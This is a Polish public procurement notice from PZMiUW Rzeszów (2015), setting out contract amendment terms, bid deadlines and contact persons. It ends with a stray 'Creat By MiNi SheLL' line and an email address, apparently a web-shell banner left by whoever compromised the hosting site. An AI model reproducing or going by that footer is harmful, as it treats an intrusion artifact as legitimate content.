h)Jeżeli w związku z przyznaniem pomocy finansowej na realizację przedmiotu umowy albo na skutek zmian warunków przyznania tej pomocy konieczna jest zmiana zapisów umowy dotyczących w szczególności zasad rozliczeń i warunków płatności za wykonanie przedmiotu umowy,
i)W przypadku wprowadzenia przez dysponenta środków finansowych dodatkowych warunków realizacji przedmiotu umowy,
j)W przypadku konieczności udzielenia zamówienia niezbędnego do wykonania przedmiotu umowy lub w szczególny sposób z nim powiązanego,
k)W przypadku konieczności zmiany osób wskazanych w § 7 ust. 2 do uczestniczenia w realizacji przedmiotu umowy, pod warunkiem, że nowe osoby spełniać będą wymagania określone przez Zamawiającego 
w specyfikacji istotnych warunków zamówienia, a wykonawca zwróci się do Zamawiającego z pisemnym wnioskiem o dokonanie zmiany, do którego załączy oświadczenie o spełnianiu przez te osoby wymogów określonych w specyfikacji istotnych warunków zamówienia wraz z kserokopią dokumentu potwierdzającego posiadanie stosownych uprawnień do wykonywania samodzielnych funkcji technicznych w budownictwie lub uprawnień w dziedzinie geodezji i kartografii,
2.Zamawiający dopuszcza, w uzasadnionych przypadkach, zmianę postanowień umowy w zakresie podwykonawstwa wraz z konsekwencjami z tego wynikającymi, w razie wystąpienia poniższych okoliczności:
a)w przypadku konieczności zmiany zakresu podwykonawstwa w stosunku do wskazanego w ofercie lub rezygnacji z wykonywania przedmiotu umowy w podwykonawstwie,
b)w przypadku zmiany lub rezygnacji z podwykonawcy, przy pomocy którego wykonawca zamierzał wykonać przedmiot umowy.
W sytuacji zmiany lub rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu wykonawca zobowiązany jest wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Wykonawca zobowiązany jest wykazać spełnienie warunku udziału w postępowaniu na dzień złożenia wniosku o dokonanie takiej zmiany oraz udokumentować spełnienie tego warunku zgodnie z wymaganiami określonymi w pkt. III.3 ogłoszenia. 
c)W sytuacji, gdy wykonawca zamierzał wykonać przedmiot umowy samodzielnie, jednakże z uwagi na wystąpienie okoliczności niemożliwych do przewidzenia w dniu składania ofert, zachodzi konieczność powierzenia wykonania części zamówienia podwykonawcy.
Dokonując powyższych zmian wykonawca zadba o odpowiednie stosowanie regulacji umowy w zakresie podwykonawstwa oraz o zabezpieczenie ewentualnych roszczeń za dotychczas wykonane zakresy robót.
3.Zamawiający ponadto dopuszcza możliwość zmiany terminu wykonania umowy i Harmonogramu realizacji i finansowania zadania w sytuacji, gdy:
a)Wystąpią niekorzystne warunki pogodowe,
b)Wystąpią przeszkody natury prawnej lub technicznej,
c)Wykonawca zakończy realizację przedmiotu umowy przed terminem określonym w § 3 albo realizację etapu robót przed terminem określonym w Harmonogramie realizacji i finansowania zadania,
d)Wystąpi brak środków finansowych w trakcie realizacji zadania.
4.Zmiana ustalonego w umowie wynagrodzenia nastąpi wyłącznie gdy zaistnieją zdarzenia objęte regulacją § 4 ust. 1, §12 ust. 4 umowy.
5.Zmiany umowy, o których mowa w niniejszym paragrafie mogą być wprowadzone w następującym trybie:
a)W przypadku wystąpienia okoliczności, o których mowa w ust. 1, 2 i 3 Wykonawca zwróci się do Zamawiającego z wnioskiem o dokonanie zmiany umowy, zawierającym stosowne uzasadnienie. Wniosek winien być złożony w formie pisemnej przed wprowadzeniem zmian, niezwłocznie po ich wystąpieniu. Zamawiający po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy dokona oceny zasadności zmiany umowy. W przypadku okoliczności leżących po stronie Zamawiającego, Wykonawca zostanie poinformowany niezwłocznie o ich zaistnieniu i konieczności zmiany umowy.
b)Wszelkie zmiany niniejszej umowy mogą być dokonywane na podstawie obustronnie uzgodnionych aneksów do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> s.i.w.z. można uzyskać pod adresem: PZMiUW Rzeszów, ul. Hetmańska 9 - pok. 123 - odbiór osobisty lub przesłanie pocztą - za odpłatnością 0,20 zł z VAT za 1 stronę A4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2015 godzina 08:30, miejsce: budynek PZMiUW Rzeszów, ul. Hetmańska 9 - pok. nr 222 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Miejsce i termin otwarcia ofert: budynek PZMiUW Rzeszów ul. Hetmańska 9 - sala konferencyjna (II p.), w dniu 17.04.2015 r. o godz. 09:00.
2)Osoby uprawnione do porozumiewania się z wykonawcami:
- Sprawy techniczne - p. Stefan Przywara (tel. 017 853-74-20),
- Sprawy techniczne - p. Mateusz Wójtowicz (tel.17 853-74-16),
- Sprawy formalne - p. Łukasz Gacek (tel. 017 853-74-07)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com